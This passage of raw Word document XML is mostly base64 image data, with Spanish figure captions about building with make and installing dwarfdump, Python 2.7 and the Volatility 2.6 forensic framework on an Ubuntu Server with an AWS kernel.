Z6XTCXrrPyxOd&#10;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mBeW2Q4E&#10;AAC7CwAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEAf2QS&#10;fYn5AACJ+QAAFAAAAAAAAAAAAAAAAAB0BgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAKAAAA&#10;AAAAACEAxbytxWgxAABoMQAAFAAAAAAAAAAAAAAAAAAvAAEAZHJzL21lZGlhL2ltYWdlMi5wbmdQ&#10;SwECLQAUAAYACAAAACEABgAwRt8AAAAIAQAADwAAAAAAAAAAAAAAAADJMQEAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAC5s8ADFAAAApQEAABkAAAAAAAAAAAAAAAAA1TIBAGRycy9fcmVs&#10;cy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAcABwC+AQAA0TMBAAAA&#10;">
                <v:group id="_x0000_s1070" style="position:absolute;width:49879;height:15690" coordsize="50401,16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oynywAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9da8JA&#10;EHwv9D8cW/CtXqJGNPUUEVt8EMEPkL4tuTUJ5vZC7prEf98TCmWedmdnZmex6k0lWmpcaVlBPIxA&#10;EGdWl5wruJw/32cgnEfWWFkmBQ9ysFq+viww1bbjI7Unn4tgwi5FBYX3dSqlywoy6Ia2Jg7czTYG&#10;fRibXOoGu2BuKjmKoqk0WHJIKLCmTUHZ/fRjFHx12K3H8bbd32+bx/c5OVz3MSk1eOvXHyA89f7/&#10;+E+90+H9+SQJmMQJPDuFBcjlLwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDisoynywAA&#10;AOMAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:shape id="Imagen 5" o:spid="_x0000_s1071" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:24652;width:2574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k8OyQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5Qm91d0E1Jq6SigUvHio9tLbI/vMBrNvY3ajyb93C4Ueh5n5htnsRteKG/Wh8awhmysQ&#10;xJU3Ddcavk+fr28gQkQ22HomDRMF2G2fnzZYGH/nL7odYy0ShEOBGmyMXSFlqCw5DHPfESfv7HuH&#10;Mcm+lqbHe4K7VuZKLaXDhtOCxY4+LFWX4+A07FfTlbvFdD3kpT3XP2FQWA5av8zG8h1EpDH+h//a&#10;e6NhuV6sszxXGfxeSndAbh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAu/ZPDskAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                    <v:imagedata r:id="rId128" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 4" o:spid="_x0000_s1072" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;top:73;width:24796;height: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mpMyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X+h+WEbzVjZpITV1FSgVLD+Kj4HHMTrOh2dmYXTX9991CweN875ktOluLK7W+cqxgOEhAEBdO&#10;V1wqOOxXT88gfEDWWDsmBT/kYTF/fJhhrt2Nt3TdhVLEEPY5KjAhNLmUvjBk0Q9cQxy5L9daDPFs&#10;S6lbvMVwW8tRkkykxYpjg8GGXg0V37uLVXA+pPul/1in+vPtfaNPBo/1eaJUv9ctX0AE6sJd/O9e&#10;6zg/m2ZpNkrHU/j7KQIg578AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAC6JqTMkAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                    <v:imagedata r:id="rId129" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1073" type="#_x0000_t202" style="position:absolute;left:345;top:10179;width:2266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HzjyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC/i0tZRXV02xlDQXYZ1F2+P5q2pNi8lSbf67Y0geHy//2+5nmwvTuRD51hBPstAEDdO&#10;d9wqOLw/3z6ACBFZY++YFHxTgPXq8mKJlXZnfqNTHVuRQjhUqMDEOFRShsaQxTBzA3Hijs5bjOn0&#10;rdQezync9rLIslJa7Dg1GBxoa6j5qkerYD//2Jub8fi028zv/Oth3Jafba3U9dW0eQQRaYr/4j/3&#10;i07zF/d5uSiKPIffnxIAcvUDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAD9h848kAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2C7FBF0F" w14:textId="6178D569" w:rsidR="00CD44B8" w:rsidRPr="00B12428" w:rsidRDefault="00CD44B8" w:rsidP="00CD44B8">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>17</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="52" w:name="_Toc155782584"/>
                        <w:r>
                          <w:t>Generando make.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="52"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17E6D05C" wp14:editId="4FE443C9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>863655</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5661660" cy="2020570"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1067930555" name="Grupo 7"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5661660" cy="2020570"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5661862" cy="2020570"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="979072588" name="Grupo 2"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5661862" cy="2020570"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5661862" cy="2020570"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1417822632" name="Imagen 1" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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3125037" y="40193"/>
                              <a:ext cx="2536825" cy="1125220"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1393486704" name="Imagen 2" descr="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente"/>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3070860" cy="2020570"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1027944089" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3088147" y="957532"/>
                            <a:ext cx="2506980" cy="678180"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0BA463E2" w14:textId="0D5E2FE4" w:rsidR="00A54B94" w:rsidRPr="003558B9" w:rsidRDefault="00A54B94" w:rsidP="00A54B94">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:noProof/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>18</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="53" w:name="_Toc155782585"/>
                              <w:r w:rsidRPr="00117088">
                                <w:t>Instalación de dwarfdump, Python 2.7, pip, Volatility 2.6 y sus librerías correctamente instaladas en el Ubuntu Server con kernel AWS.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6D05C" id="Grupo 7" o:spid="_x0000_s1074" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:68pt;width:445.8pt;height:159.1pt;z-index:251722752;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="56618,20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&#10;W